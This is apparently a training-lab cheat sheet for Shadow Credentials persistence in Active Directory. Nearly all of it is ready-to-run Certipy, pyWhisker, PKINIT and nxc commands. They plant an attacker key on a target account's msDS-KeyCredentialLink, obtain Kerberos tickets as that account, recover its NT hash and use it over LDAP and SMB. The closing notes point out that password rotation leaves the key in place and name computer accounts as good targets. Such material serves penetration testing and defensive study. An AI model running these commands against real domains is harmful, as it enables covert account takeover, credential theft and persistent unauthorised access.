Shadow Credentials persistence adds an attacker-controlled public key to msDS-KeyCredentialLink on a user or computer account. As long as that key credential remains, we can authenticate with PKINIT as the target without knowing the target password.
Variables
export DOMAIN=ootw.local
export DC=10.10.10.200
export USER=student
export PASS='student'
export TARGET=svc_web
Automatic Certipy flow
certipy shadow auto -u "$USER@$DOMAIN" -p "$PASS" -account "$TARGET" -dc-ip $DC
Manual add with pyWhisker
python3 pywhisker.py -d $DOMAIN -u $USER -p "$PASS" --target "$TARGET" --action add --filename "$TARGET"
python3 gettgtpkinit.py -cert-pfx "$TARGET.pfx" -pfx-pass PFX_PASSWORD "$DOMAIN/$TARGET" "$TARGET.ccache"
export KRB5CCNAME="$TARGET.ccache"
klist
Recover NT hash from PKINIT
python3 getnthash.py -key AS_REP_KEY "$DOMAIN/$TARGET"
Use the ticket
nxc ldap $DC -k --use-kcache
nxc smb $DC -k --use-kcache
List key credentials
certipy shadow list -u "$USER@$DOMAIN" -p "$PASS" -account "$TARGET" -dc-ip $DC
python3 pywhisker.py -d $DOMAIN -u $USER -p "$PASS" --target "$TARGET" --action list
Remove key credentials
certipy shadow remove -u "$USER@$DOMAIN" -p "$PASS" -account "$TARGET" -dc-ip $DC -device-id DEVICE_ID
python3 pywhisker.py -d $DOMAIN -u $USER -p "$PASS" --target "$TARGET" --action remove --device-id DEVICE_ID
Notes
- Shadow Credentials are attribute persistence.
- Password rotation alone does not remove the attacker key.
- The exact
msDS-KeyCredentialLinkblob has to be removed. - Computer accounts are excellent targets because they often have useful delegation or local admin paths.